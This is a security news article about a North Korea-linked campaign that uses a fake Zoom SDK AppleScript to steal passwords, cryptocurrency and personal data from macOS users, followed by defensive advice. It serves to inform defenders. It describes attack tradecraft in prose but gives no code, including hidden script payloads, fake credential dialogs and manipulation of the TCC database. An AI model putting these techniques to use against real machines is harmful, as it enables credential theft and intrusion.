A sophisticated cybercriminal group, identified as Sapphire Sleet and linked to North Korea, has initiated a targeted campaign against macOS users. This new intrusion chain leverages a deceptive Zoom SDK update to trick unsuspecting individuals into executing malware designed to steal sensitive information, including passwords, cryptocurrency, and personal data. The attack highlights a growing trend of social engineering tactics being employed to bypass technical security measures on macOS, prioritizing user manipulation over exploiting software vulnerabilities.
Microsoft Threat Intelligence analysts uncovered the campaign, noting its distinct execution patterns, particularly the use of AppleScript as a primary credential-harvesting tool, which represents a novel approach for Sapphire Sleet. The threat actor primarily targets individuals and organizations within the cryptocurrency, finance, venture capital, and blockchain sectors. Following the discovery, Microsoft responsibly disclosed its findings to Apple, which has since implemented XProtect signature updates and updated its Safari Safe Browsing protections to counter the threat.
Inside the Sapphire Sleet macOS Intrusion Chain
The infiltration begins with a carefully constructed social engineering narrative. Sapphire Sleet actors pose as recruiters on professional networking platforms, engaging victims in career-related discussions and subsequently scheduling a fake technical interview. During this interview, the victim is instructed to download a file named “Zoom SDK Update.scpt.” This compiled AppleScript leverages the macOS Script Editor application, a legitimate and trusted Apple-built tool, to mask its malicious intent. Upon opening, the script presents what appears to be routine upgrade instructions, while thousands of blank lines conceal the executable malicious code.
Once the AppleScript is executed, the infection progresses through a rapid sequence of commands. The initial script invokes the genuine macOS “softwareupdate” binary with an invalid parameter, simulating a legitimate system process. It then employs “curl” to retrieve a remote AppleScript payload and directly feeds it to the “osascript” interpreter. This multi-stage execution pattern continues through five distinct phases, each identified by specific user-agent strings (mac-cur1 through mac-cur5), enabling Sapphire Sleet to manage payload delivery and monitor the campaign’s progress.
The mac-cur1 stage functions as the primary orchestrator. It gathers system details, registers the compromised machine with Sapphire Sleet’s command-and-control servers, and deploys a host monitoring binary masquerading as “com.apple.cli.” Concurrently, a backdoor component, dubbed “services,” installs a launch daemon named “com.google.webkit.service.plist.” This naming convention is deliberately chosen to mimic legitimate Apple and Google services, ensuring its persistence across reboots without raising suspicion.
.webp)
The mac-cur2 stage introduces the credential harvesting component, disguised as “systemupdate.app.” This application presents a native macOS password dialog, identical to those generated by legitimate system processes. Upon the user entering their credentials, the malware validates the password against the local authentication database and transmits it to Sapphire Sleet’s servers via the Telegram Bot API. A subsequent fake application, “softwareupdate.app,” then displays a misleading “system update complete” message to allay any user suspicion.
To circumvent macOS security layers like Gatekeeper and Transparency Consent and Control (TCC), the mac-cur3 stage employs a tactic of manipulating the TCC database. It directs Finder to temporarily rename the TCC folder, allowing the malware to insert permissions that grant “osascript” access to sensitive files without triggering a user consent prompt. A lengthy exfiltration script, spanning 575 lines, then systematically collects nine distinct categories of data before uploading them to attacker-controlled servers. This sophisticated data exfiltration is designed to operate silently in the background.
The overarching strategy of this Sapphire Sleet campaign relies heavily on user interaction to bypass macOS’s inherent security features. By prompting users to manually execute files, especially within the context of a professional interaction like an online interview, the threat actor shifts the execution into a user-initiated context where protections like Gatekeeper have diminished efficacy. This underscores the critical importance of user awareness and vigilance against sophisticated social engineering schemes.
Users and organizations are advised to treat any unsolicited requests to run terminal commands or download executable files during online interviews with extreme caution. Defensive measures should include blocking compiled AppleScript (.scpt) files where possible, regularly auditing LaunchDaemon plist files for any unexpected or unauthorized entries, and monitoring the TCC database for signs of unauthorized permission modifications. Maintaining updated macOS ensures that the latest XProtect signatures and Safari Safe Browsing protections are active, which can help block known components associated with this specific campaign.